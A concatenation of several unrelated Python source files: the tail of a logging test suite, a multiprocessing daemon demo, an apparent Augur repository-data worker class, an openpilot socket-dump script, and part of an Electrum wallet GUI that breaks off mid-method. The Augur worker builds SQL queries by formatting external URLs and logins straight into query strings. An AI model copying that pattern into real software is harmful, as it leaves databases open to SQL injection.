print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
multiprocessing_daemon.py
|
import multiprocessing
import time
import sys
def daemon():
p = multiprocessing.current_process()
    print('starting:', p.name, p.pid)
sys.stdout.flush()
time.sleep(2)
    print('Exiting :', p.name, p.pid)
sys.stdout.flush()
def non_daemon():
p = multiprocessing.current_process()
    print('starting:', p.name, p.pid)
sys.stdout.flush()
    print('Exiting :', p.name, p.pid)
sys.stdout.flush()
if __name__ == '__main__':
d = multiprocessing.Process(name='daemon', target=daemon)
d.daemon = True
n = multiprocessing.Process(name='non_daemon', target=non_daemon)
n.daemon = False
d.start()
time.sleep(1)
n.start()
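    # Illustrative note (not part of the original example): since the parent
    # never join()s its children, the program exits once the non-daemon process
    # finishes, and the daemon child is terminated before its 2-second sleep
    # completes, so its "Exiting" line normally never appears. To wait for both
    # children explicitly one could add, for example:
    #
    #     d.join(3)   # wait up to 3 seconds for the daemon process
    #     n.join()    # wait for the non-daemon process to finish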
|
worker_base.py
|
from workers.worker_persistance import *
# I figure I can separate this class into at least three parts.
# I should also look into the subclass and see what uses what.
#
# Parts (hierarchical relation)
# 1. Persistence
# 2. Base
# 3. Github/lab
# Might be good to separate the machine learning functionality into its own class too.
class Worker(Persistant):
## Set Thread Safety for OSX
# os.system("./osx-thread.sh")
def __init__(self, worker_type, config={}, given=[], models=[], data_tables=[], operations_tables=[], platform="github"):
        # Construct the persistence functionality for the worker
super().__init__(worker_type,data_tables,operations_tables)
self.collection_start_time = None
self._task = None # task currently being worked on (dict)
self._child = None # process of currently running task (multiprocessing process)
self._queue = Queue() # tasks stored here 1 at a time (in a mp queue so it can translate across multiple processes)
# if we are finishing a previous task, certain operations work differently
self.finishing_task = False
# Update config with options that are general and not specific to any worker
self.augur_config = AugurConfig(self._root_augur_dir)
#TODO: consider taking parts of this out for the base class and then overriding it in WorkerGitInterfaceable
self.config.update({'offline_mode': False})
self.config.update(config)
self.task_info = None
self.repo_id = None
self.owner = None
self.repo = None
self.given = given
self.models = models
self.debug_data = [] if 'debug_data' not in self.config else self.config['debug_data']
self.specs = {
'id': self.config['id'], # what the broker knows this worker as
'location': self.config['location'], # host + port worker is running on (so broker can send tasks here)
'qualifications': [
{
'given': self.given, # type of repo this worker can be given as a task
'models': self.models # models this worker can fill for a repo as a task
}
],
'config': self.config
}
# Send broker hello message
if self.config['offline_mode'] is False:
self.connect_to_broker()
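        # If a subclass has not already defined tool_source/tool_version/data_source,
        # fall back to the generic testing defaults below.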
try:
self.tool_source
self.tool_version
self.data_source
        except AttributeError:
self.tool_source = 'Augur Worker Testing'
self.tool_version = '0.0.0'
self.data_source = 'Augur Worker Testing'
def write_debug_data(self, data, name):
if name in self.debug_data:
with open(f'{name}.json', 'w') as f:
json.dump(data, f)
@property
def results_counter(self):
""" Property that is returned when the worker's current results_counter is referenced
"""
if self.worker_type == 'facade_worker':
return self.cfg.repos_processed #TODO: figure out why this doesn't work...
else:
return self._results_counter
@results_counter.setter
    def results_counter(self, value):
        """ Setter for the worker's results counter """
        self._results_counter = value
@property
def task(self):
""" Property that is returned when the worker's current task is referenced
"""
return self._task
@task.setter
def task(self, value):
""" entry point for the broker to add a task to the queue
Adds this task to the queue, and calls method to process queue
"""
# If the task has one of our "valid" job types
if value['job_type'] == "UPDATE" or value['job_type'] == "MAINTAIN":
self._queue.put(value)
# Setting that causes paginating through ALL pages, not just unknown ones
# This setting is set by the housekeeper and is attached to the task before it gets sent here
if 'focused_task' in value:
if value['focused_task'] == 1:
self.logger.debug("Focused task is ON\n")
self.finishing_task = True
self._task = value
self.run()
def cancel(self):
""" Delete/cancel current task
"""
self._task = None
def run(self):
""" Kicks off the processing of the queue if it is not already being processed
Gets run whenever a new task is added
"""
# Spawn a subprocess to handle message reading and performing the tasks
self._child = Process(target=self.collect, args=())
self._child.start()
def collect(self):
""" Function to process each entry in the worker's task queue
Determines what action to take based off the message type
"""
        self.initialize_logging() # need to initialize logging again in the child process because of multiprocessing
self.logger.info("Starting data collection process\n")
self.initialize_database_connections()
#self.logger.info("Got to this point.")
#self.logger.info(f"This is the oauths 0 index {self.oauths}")
while True:
if not self._queue.empty():
message = self._queue.get() # Get the task off our MP queue
else:
self.logger.info("No job found.")
break
self.logger.info("Popped off message: {}\n".format(str(message)))
if message['job_type'] == 'STOP':
break
# If task is not a valid job type
if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':
raise ValueError('{} is not a recognized task type'.format(message['job_type']))
pass
# Query repo_id corresponding to repo url of given task
repoUrlSQL = s.sql.text("""
SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'
""".format(message['given'][self.given[0][0]]))
repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])
self.logger.info("repo_id for which data collection is being initiated: {}".format(str(repo_id)))
# Call method corresponding to model sent in task
try:
model_method = getattr(self, '{}_model'.format(message['models'][0]))
                #TODO: set this to record exceptions separately. This errored and it took a while to figure that ^ wasn't the line that was erroring.
self.record_model_process(repo_id, 'repo_info')
except Exception as e:
self.logger.error('Error: {}.\nNo defined method for model: {}, '.format(e, message['models'][0]) +
'must have name of {}_model'.format(message['models'][0]))
self.register_task_failure(message, repo_id, e)
break
# Model method calls wrapped in try/except so that any unexpected error that occurs can be caught
# and worker can move onto the next task without stopping
try:
self.logger.info("Calling model method {}_model".format(message['models'][0]))
self.task_info = message
self.repo_id = repo_id
self.owner, self.repo = self.get_owner_repo(list(message['given'].values())[0])
model_method(message, repo_id)
except Exception as e: # this could be a custom exception, might make things easier
self.register_task_failure(message, repo_id, e)
break
self.logger.debug('Closing database connections\n')
self.db.dispose()
self.helper_db.dispose()
self.logger.info("Collection process finished")
def connect_to_broker(self):
connected = False
for i in range(5):
try:
self.logger.debug("Connecting to broker, attempt {}\n".format(i))
if i > 0:
time.sleep(10)
requests.post('http://{}:{}/api/unstable/workers'.format(
self.config['host_broker'],self.config['port_broker']), json=self.specs)
self.logger.info("Connection to the broker was successful\n")
connected = True
break
except requests.exceptions.ConnectionError:
self.logger.error('Cannot connect to the broker. Trying again...\n')
if not connected:
sys.exit('Could not connect to the broker after 5 attempts! Quitting...\n')
@staticmethod
def dump_queue(queue):
""" Empties all pending items in a queue and returns them in a list.
"""
result = []
queue.put("STOP")
for i in iter(queue.get, 'STOP'):
result.append(i)
# time.sleep(.1)
return result
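    # Illustrative usage (not in the original): leftover = Worker.dump_queue(self._queue)
    # drains any queued tasks; the method works by pushing a "STOP" sentinel and
    # consuming items until that sentinel comes back out.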
def find_id_from_login(self, login, platform='github'):
""" Retrieves our contributor table primary key value for the contributor with
the given GitHub login credentials, if this contributor is not there, then
they get inserted.
:param login: String, the GitHub login username to find the primary key id for
:return: Integer, the id of the row in our database with the matching GitHub login
"""
idSQL = s.sql.text("""
SELECT cntrb_id FROM contributors WHERE cntrb_login = '{}' \
AND LOWER(data_source) = '{} api'
""".format(login, platform))
rs = pd.read_sql(idSQL, self.db, params={})
data_list = [list(row) for row in rs.itertuples(index=False)]
try:
return data_list[0][0]
        except IndexError:
self.logger.info('contributor needs to be added...')
if platform == 'github':
cntrb_url = ("https://api.github.com/users/" + login)
elif platform == 'gitlab':
cntrb_url = ("https://gitlab.com/api/v4/users?username=" + login )
self.logger.info("Hitting endpoint: {} ...\n".format(cntrb_url))
while True:
try:
r = requests.get(url=cntrb_url, headers=self.headers)
break
except TimeoutError as e:
                    self.logger.info("Request timed out. Sleeping 30 seconds and trying again...\n")
time.sleep(30)
self.update_rate_limit(r)
contributor = r.json()
company = None
location = None
email = None
if 'company' in contributor:
company = contributor['company']
if 'location' in contributor:
location = contributor['location']
if 'email' in contributor:
email = contributor['email']
if platform == 'github':
cntrb = {
'cntrb_login': contributor['login'] if 'login' in contributor else None,
'cntrb_email': contributor['email'] if 'email' in contributor else None,
'cntrb_company': contributor['company'] if 'company' in contributor else None,
'cntrb_location': contributor['location'] if 'location' in contributor else None,
'cntrb_created_at': contributor['created_at'] if 'created_at' in contributor else None,
'cntrb_canonical': contributor['email'] if 'email' in contributor else None,
'gh_user_id': contributor['id'] if 'id' in contributor else None,
'gh_login': contributor['login'] if 'login' in contributor else None,
'gh_url': contributor['url'] if 'url' in contributor else None,
'gh_html_url': contributor['html_url'] if 'html_url' in contributor else None,
'gh_node_id': contributor['node_id'] if 'node_id' in contributor else None,
'gh_avatar_url': contributor['avatar_url'] if 'avatar_url' in contributor else None,
'gh_gravatar_id': contributor['gravatar_id'] if 'gravatar_id' in contributor else None,
'gh_followers_url': contributor['followers_url'] if 'followers_url' in contributor else None,
'gh_following_url': contributor['following_url'] if 'following_url' in contributor else None,
'gh_gists_url': contributor['gists_url'] if 'gists_url' in contributor else None,
'gh_starred_url': contributor['starred_url'] if 'starred_url' in contributor else None,
'gh_subscriptions_url': contributor['subscriptions_url'] if 'subscriptions_url' in contributor else None,
'gh_organizations_url': contributor['organizations_url'] if 'organizations_url' in contributor else None,
'gh_repos_url': contributor['repos_url'] if 'repos_url' in contributor else None,
'gh_events_url': contributor['events_url'] if 'events_url' in contributor else None,
'gh_received_events_url': contributor['received_events_url'] if 'received_events_url' in contributor else None,
'gh_type': contributor['type'] if 'type' in contributor else None,
'gh_site_admin': contributor['site_admin'] if 'site_admin' in contributor else None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
elif platform == 'gitlab':
cntrb = {
'cntrb_login': contributor[0]['username'] if 'username' in contributor[0] else None,
'cntrb_email': email,
'cntrb_company': company,
'cntrb_location': location,
'cntrb_created_at': contributor[0]['created_at'] if 'created_at' in contributor[0] else None,
'cntrb_canonical': email,
'gh_user_id': contributor[0]['id'],
'gh_login': contributor[0]['username'],
'gh_url': contributor[0]['web_url'],
'gh_html_url': None,
'gh_node_id': None,
'gh_avatar_url': contributor[0]['avatar_url'],
'gh_gravatar_id': None,
'gh_followers_url': None,
'gh_following_url': None,
'gh_gists_url': None,
'gh_starred_url': None,
'gh_subscriptions_url': None,
'gh_organizations_url': None,
'gh_repos_url': None,
'gh_events_url': None,
'gh_received_events_url': None,
'gh_type': None,
'gh_site_admin': None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
result = self.db.execute(self.contributors_table.insert().values(cntrb))
self.logger.info("Primary key inserted into the contributors table: " + str(result.inserted_primary_key))
self.results_counter += 1
self.cntrb_id_inc = int(result.inserted_primary_key[0])
self.logger.info(f"Inserted contributor: {cntrb['cntrb_login']}\n")
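            # Look the contributor up again so the caller gets the primary key that
            # was just generated by the insert above.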
return self.find_id_from_login(login, platform)
def get_owner_repo(self, git_url):
""" Gets the owner and repository names of a repository from a git url
:param git_url: String, the git url of a repository
:return: Tuple, includes the owner and repository names in that order
"""
split = git_url.split('/')
owner = split[-2]
repo = split[-1]
if '.git' == repo[-4:]:
repo = repo[:-4]
return owner, repo
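    # For example (illustrative): get_owner_repo('https://github.com/chaoss/augur.git')
    # returns ('chaoss', 'augur'); a trailing '.git' is stripped above.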
def record_model_process(self, repo_id, model):
self.logger.info(f"This is the oauths 0 index {self.oauths[0]}")
task_history = {
"repo_id": repo_id,
"worker": self.config['id'],
"job_model": model,
"oauth_id": self.oauths[0]['oauth_id'],
"timestamp": datetime.datetime.now(),
"status": "Stopped",
"total_results": self.results_counter
}
if self.finishing_task:
result = self.helper_db.execute(self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id).values(task_history))
self.history_id += 1
else:
result = self.helper_db.execute(self.worker_history_table.insert().values(task_history))
self.logger.info("Record incomplete history tuple: {}\n".format(result.inserted_primary_key))
self.history_id = int(result.inserted_primary_key[0])
self.collection_start_time = time.time()
def register_task_completion(self, task, repo_id, model):
        self.logger.info(f"Worker completed this task in {time.time() - self.collection_start_time} seconds.\n")
# Task to send back to broker
task_completed = {
'worker_id': self.config['id'],
'job_type': "MAINTAIN",
'repo_id': repo_id,
'job_model': model
}
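        # Work out which kind of URL this task was given (github, gitlab or plain git)
        # so the matching key/value can be echoed back to the broker on completion.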
key = 'github_url' if 'github_url' in task['given'] else 'git_url' if 'git_url' in task['given'] else \
'gitlab_url' if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
task_completed[key] = task['given']['github_url'] if 'github_url' in task['given'] else task['given']['git_url'] \
if 'git_url' in task['given'] else task['given']['gitlab_url'] if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
if key == 'INVALID_GIVEN':
self.register_task_failure(task, repo_id, "INVALID_GIVEN: Not a github/gitlab/git url.")
return
# Add to history table
task_history = {
'repo_id': repo_id,
'worker': self.config['id'],
'job_model': model,
'oauth_id': self.oauths[0]['oauth_id'],
'timestamp': datetime.datetime.now(),
'status': "Success",
'total_results': self.results_counter
}
self.helper_db.execute(self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id).values(task_history))
self.logger.info(f"Recorded job completion for: {task_completed}\n")
# Update job process table
updated_job = {
'since_id_str': repo_id,
'last_count': self.results_counter,
'last_run': datetime.datetime.now(),
'analysis_state': 0
}
self.helper_db.execute(self.worker_job_table.update().where(
self.worker_job_table.c.job_model==model).values(updated_job))
self.logger.info(f"Updated job process for model: {model}\n")
if self.config['offline_mode'] is False:
# Notify broker of completion
self.logger.info(f"Telling broker we completed task: {task_completed}\n")
self.logger.info(f"This task inserted: {self.results_counter + self.insert_counter} tuples " +
f"and updated {self.update_counter} tuples.\n")
requests.post('http://{}:{}/api/unstable/completed_task'.format(
self.config['host_broker'],self.config['port_broker']), json=task_completed)
# Reset results counter for next task
self.results_counter = 0
self.insert_counter = 0
self.update_counter = 0
def register_task_failure(self, task, repo_id, e):
self.logger.error(f"Worker ran into an error for task: {task}")
        self.logger.error(
            f"Worker was processing this task for {time.time() - self.collection_start_time} "
            "seconds."
        )
self.logger.error("Printing traceback...")
self.logger.error(e)
tb = traceback.format_exc()
self.logger.error(tb)
self.logger.info(f"This task inserted {self.results_counter} tuples before failure.")
self.logger.info("Notifying broker and logging task failure in database...")
key = (
'github_url' if 'github_url' in task['given'] else 'git_url'
if 'git_url' in task['given'] else 'gitlab_url'
if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
)
        url = task['given'][key]
        # Query the repo_id corresponding to the repo url of the given task
repoUrlSQL = s.sql.text("""
SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'
""".format(url))
repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])
task['worker_id'] = self.config['id']
try:
requests.post("http://{}:{}/api/unstable/task_error".format(
self.config['host_broker'],self.config['port_broker']), json=task)
except requests.exceptions.ConnectionError:
self.logger.error("Could not send task failure message to the broker:")
self.logger.error(e)
except Exception:
            self.logger.error("An error occurred while informing broker about task failure:")
self.logger.error(e)
# Add to history table
task_history = {
"repo_id": repo_id,
"worker": self.config['id'],
"job_model": task['models'][0],
"oauth_id": self.oauths[0]['oauth_id'],
"timestamp": datetime.datetime.now(),
"status": "Error",
"total_results": self.results_counter
}
self.helper_db.execute(
self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id
).values(task_history)
)
self.logger.error(f"Recorded job error in the history table for: {task}")
# Update job process table
updated_job = {
"since_id_str": repo_id,
"last_count": self.results_counter,
"last_run": datetime.datetime.now(),
"analysis_state": 0
}
self.helper_db.execute(
self.worker_job_table.update().where(
self.worker_job_table.c.job_model==task['models'][0]
).values(updated_job)
)
self.logger.info(f"Updated job process for model: {task['models'][0]}\n")
# Reset results counter for next task
self.results_counter = 0
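# Illustrative sketch (not part of the original module, names are hypothetical):
# a concrete worker subclasses Worker and exposes one `<model>_model` method per
# model it advertises, because collect() dispatches tasks via
# getattr(self, '<model>_model') and calls it as method(task, repo_id), e.g.:
#
#     class ExampleWorker(Worker):
#         def __init__(self, config={}):
#             super().__init__(worker_type='example_worker', config=config,
#                              given=[['github_url']], models=['example'])
#
#         def example_model(self, task, repo_id):
#             # collect data for repo_id and write it through the persistence layer
#             pass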
|
dump.py
|
#!/usr/bin/env python
import sys
import argparse
import zmq
import json
from hexdump import hexdump
from threading import Thread
from cereal import log
import selfdrive.messaging as messaging
from selfdrive.services import service_list
def run_server(socketio):
socketio.run(app, host='0.0.0.0', port=4000)
if __name__ == "__main__":
context = zmq.Context()
poller = zmq.Poller()
  parser = argparse.ArgumentParser(description='Sniff a communication socket')
parser.add_argument('--pipe', action='store_true')
parser.add_argument('--raw', action='store_true')
parser.add_argument('--json', action='store_true')
parser.add_argument('--dump-json', action='store_true')
parser.add_argument('--no-print', action='store_true')
parser.add_argument('--proxy', action='store_true', help='republish on localhost')
parser.add_argument('--map', action='store_true')
parser.add_argument('--addr', default='127.0.0.1')
parser.add_argument('--values', help='values to monitor (instead of entire event)')
parser.add_argument("socket", type=str, nargs='*', help="socket name")
args = parser.parse_args()
republish_socks = {}
for m in args.socket if len(args.socket) > 0 else service_list:
if m in service_list:
port = service_list[m].port
elif m.isdigit():
port = int(m)
else:
print("service not found")
exit(-1)
sock = messaging.sub_sock(context, port, poller, addr=args.addr)
if args.proxy:
republish_socks[sock] = messaging.pub_sock(context, port)
if args.map:
from flask.ext.socketio import SocketIO #pylint: disable=no-name-in-module, import-error
from flask import Flask
app = Flask(__name__)
socketio = SocketIO(app, async_mode='threading')
server_thread = Thread(target=run_server, args=(socketio,))
server_thread.daemon = True
server_thread.start()
    print('server running')
values = None
if args.values:
values = [s.strip().split(".") for s in args.values.split(",")]
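  # Illustrative: "--values liveLocation.lat,liveLocation.lon" becomes
  # [['liveLocation', 'lat'], ['liveLocation', 'lon']], i.e. one dotted
  # attribute path per monitored field.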
while 1:
polld = poller.poll(timeout=1000)
for sock, mode in polld:
if mode != zmq.POLLIN:
continue
msg = sock.recv()
evt = log.Event.from_bytes(msg)
if sock in republish_socks:
republish_socks[sock].send(msg)
if args.map and evt.which() == 'liveLocation':
        print('send loc')
socketio.emit('location', {
'lat': evt.liveLocation.lat,
'lon': evt.liveLocation.lon,
'alt': evt.liveLocation.alt,
})
if not args.no_print:
if args.pipe:
sys.stdout.write(msg)
sys.stdout.flush()
elif args.raw:
hexdump(msg)
elif args.json:
print(json.loads(msg))
elif args.dump_json:
          print(json.dumps(evt.to_dict()))
        elif values:
          print("logMonotime = {}".format(evt.logMonoTime))
for value in values:
if hasattr(evt, value[0]):
item = evt
for key in value:
                item = getattr(item, key)
              print("{} = {}".format(".".join(value), item))
          print("")
else:
          print(evt)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.wallet import update_password_for_directory
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice, parse_max_spend)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from electrum.bitcoin import COIN
from electrum.gui import messages
from .i18n import _
from .util import get_default_language
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache to keep memory use down; a timeout of 0 caches
# the data forever
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
if not self._init_finished:
return
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def set_auto_connect(self, b: bool):
        # This method makes sure we persist b into the config even if self.auto_connect == b.
# Note: on_auto_connect() only gets called if the value of the self.auto_connect property *changes*.
self.electrum_config.set_key('auto_connect', b)
self.auto_connect = b
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
if not self._init_finished:
return
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.network:
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
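        # Clock.schedule_interval keeps calling f until it returns False, so the
        # wrapped call runs once the wallet and send_screen exist and then stops.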
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME or scheme == LIGHTNING_URI_SCHEME:
self.set_URI(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
